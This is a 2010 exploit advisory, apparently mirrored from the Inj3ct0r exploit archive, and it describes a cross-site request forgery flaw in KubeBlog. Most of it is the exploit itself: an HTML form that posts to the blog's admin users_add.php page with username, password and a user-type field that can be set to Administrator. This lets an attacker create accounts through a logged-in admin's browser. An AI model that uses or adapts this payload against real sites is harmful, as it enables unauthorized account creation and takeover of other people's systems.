Home / os / win7

KubeBlog XSRF Vulnerabilities

Posted on 03 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>KubeBlog XSRF Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================= KubeBlog XSRF Vulnerabilities ============================= ======================================================================================== | # Title : KubeBlog XSRF Vuln. | # Author : The.Morpheus | # email : fats0L@windowslive.com | # Home : http://www.spyturks.com # Date :03.05.2010 | # Script : Copyright © 2008 Kubelabs.com All Rights Reserved | # Tested on: http://demos.kubelabs.com/kubeblog | # Bug : Yeni User Eklenebilinir. ====================== Exploit By The.Morpheus ================================= # Exploit : &lt;form name=&quot;form1&quot; method=&quot;post&quot; action=&quot; http://[vuln_site]/kubeblog/adm/users_add.php&quot;&gt; &lt;table width=&quot;70%&quot; cellpadding=&quot;0&quot; cellspacing=&quot;2&quot; border=&quot;0&quot;&gt; &lt;tr&gt; &lt;td width=&quot;35%&quot;&gt; &lt;/td&gt; &lt;td width=&quot;65%&quot;&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;&lt;strong&gt;Username (&lt;a href=&quot;#&quot; onClick=&quot;MM_openBrWindow('help.php?id=6','help','width=500,height=200')&quot;&gt;?&lt;/a&gt;)&lt;/strong&gt;&lt;/td&gt; &lt;td&gt;:&lt;input name=&quot;username&quot; type=&quot;Text&quot; class=&quot;textbox&quot; id=&quot;username&quot; style=&quot;width:60%&quot; value=&quot;&quot;&gt;&lt;span class=&quot;error&quot;&gt;&lt;/span&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;&lt;strong&gt;Password (&lt;a href=&quot;#&quot; onClick=&quot;MM_openBrWindow('help.php?id=7','help','width=500,height=200')&quot;&gt;?&lt;/a&gt;)&lt;/strong&gt;&lt;/td&gt; &lt;td&gt;:&lt;input name=&quot;password&quot; type=&quot;password&quot; class=&quot;textbox&quot; id=&quot;password&quot; style=&quot;width:60%&quot; value=&quot;&quot;&gt;&lt;span class=&quot;error&quot;&gt;&lt;/span&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;&lt;strong&gt;Confirm Password (&lt;a href=&quot;#&quot; onClick=&quot;MM_openBrWindow('help.php?id=8','help','width=500,height=200')&quot;&gt;?&lt;/a&gt;)&lt;/strong&gt;&lt;/td&gt; &lt;td&gt;:&lt;input name=&quot;password2&quot; type=&quot;password&quot; class=&quot;textbox&quot; id=&quot;password2&quot; style=&quot;width:60%&quot; value=&quot;&quot;&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;&lt;strong&gt;User Type (&lt;a href=&quot;#&quot; onClick=&quot;MM_openBrWindow('help.php?id=9','help','width=500,height=200')&quot;&gt;?&lt;/a&gt;)&lt;/strong&gt;&lt;/td&gt; &lt;td&gt;: &lt;select name=&quot;user_type&quot;&gt; &lt;option value='2'&gt;User&lt;/option&gt;&lt;option value='3'&gt;Administrator&lt;/option&gt;&lt;option value='4'&gt;Moderator&lt;/option&gt; &lt;/select&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt; &lt;/td&gt; &lt;td&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;&lt;/td&gt; &lt;td height=&quot;30&quot; style=&quot;padding-left:6px;&quot;&gt; &lt;input name=&quot;Submit&quot; type=&quot;submit&quot; class=&quot;button&quot; value=&quot;Submit&quot;&gt; &lt;input name=&quot;Reset&quot; type=&quot;reset&quot; class=&quot;button&quot; value=&quot;Reset&quot;&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;/form&gt;&lt;/td&gt; ############################################################################################ # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP